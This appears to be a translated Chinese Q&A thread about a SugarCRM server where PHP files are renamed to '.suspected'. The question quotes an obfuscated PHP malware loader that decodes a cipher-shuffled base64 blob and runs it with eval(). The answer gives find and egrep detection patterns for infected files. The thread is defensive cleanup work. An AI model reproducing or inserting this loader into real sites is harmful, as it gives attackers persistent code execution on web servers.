php 文件自动重命名为 php.suspected

Question

自过去 4 天以来，我们在生产服务器(AWS EC2 实例)上遇到了一个奇怪的问题，该问题仅针对一个站点，即 SugarCRM。

问题是 /home/site_folder/public_html/include/MassUpdate.php 文件自动重命名为 /home/site_folder/public_html/include/MassUpdate.php.suspected

这种情况一天会发生 2-3 次，间隔时间为 3-4 小时。此问题仅在特定站点的情况下发生，即使同一站点的暂存副本也不会发生。我什至从两个站点检查了该文件的代码，它是相同的。

我们通过谷歌搜索发现，此类问题主要出现在 Wordpress 网站上，可能是因为受到攻击。但是我们检查了我们的服务器是否受到攻击，没有。服务器上也没有运行病毒/恶意软件扫描。

我们该怎么办？

更新:通过这个 link 后我们发现了一些东西我们执行egrep -Rl 'function.*for.*strlen.*isset'/home/username/public_html/ 发现很少有文件有如下示例代码。

    <?php
function flnftovr($hkbfqecms, $bezzmczom){$ggy = ''; for($i=0; $i < strlen($hkbfqecms); $i++){$ggy .= isset($bezzmczom[$hkbfqecms[$i]]) ? $bezzmczom[$hkbfqecms[$i]] : $hkbfqecms[$i];}
$ixo="base64_decode";return $ixo($ggy);}
$s = 'DMtncCPWxODe8uC3hgP3OuEKx3hjR5dCy56kT6kmcJdkOBqtSZ91NMP1OuC3hgP3h3hjRamkT6kmcJdkOBqtSZ91NJV'.
'0OuC0xJqvSMtKNtPXcJvt8369GZpsZpQWxOlzSMtrxCPjcJvkSZ96byjbZgtgbMtWhuCXbZlzHXCoCpCob'.'zxJd7Nultb4qthgtfNMtixo9phgCWbopsZ1X=';
$koicev = Array('1'=>'n', '0'=>'4', '3'=>'y', '2'=>'8', '5'=>'E', '4'=>'H', '7'=>'j', '6'=>'w', '9'=>'g', '8'=>'J', 'A'=>'Y', 'C'=>'V', 'B'=>'3', 'E'=>'x', 'D'=>'Q', 'G'=>'M', 'F'=>'i', 'I'=>'P', 'H'=>'U', 'K'=>'v', 'J'=>'W', 'M'=>'G', 'L'=>'L', 'O'=>'X', 'N'=>'b', 'Q'=>'B', 'P'=>'9', 'S'=>'d', 'R'=>'I', 'U'=>'r', 'T'=>'O', 'W'=>'z', 'V'=>'F', 'Y'=>'q', 'X'=>'0', 'Z'=>'C', 'a'=>'D', 'c'=>'a', 'b'=>'K', 'e'=>'o', 'd'=>'5', 'g'=>'m', 'f'=>'h', 'i'=>'6', 'h'=>'c', 'k'=>'p', 'j'=>'s', 'm'=>'A', 'l'=>'R', 'o'=>'S', 'n'=>'u', 'q'=>'N', 'p'=>'k', 's'=>'7', 'r'=>'t', 'u'=>'2', 't'=>'l', 'w'=>'e', 'v'=>'1', 'y'=>'T', 'x'=>'Z', 'z'=>'f');
eval(flnftovr($s, $koicev));?>

似乎是一些恶意软件，我们如何永久删除它？

谢谢

Answer 1

将 .php 文件重命名为 .php.suspected 今天一直在发生。以下命令不应产生任何结果:

find <web site root> -name '*.suspected' -print
find <web site root> -name '.*.ico' -print

在我的例子中，可以使用以下命令找到受感染的文件:

cd <web site root>
egrep -Rl '\$GLOBALS.*\\x'
egrep -Rl -Ezo '/\*(\w+)\*/\s*@include\s*[^;]+;\s*/\*'
egrep -Rl -E '^.+(\$_COOKIE|\$_POST).+eval.+$'

我已经在 GitHub 准备了对问题的更详细描述以及如何处理它.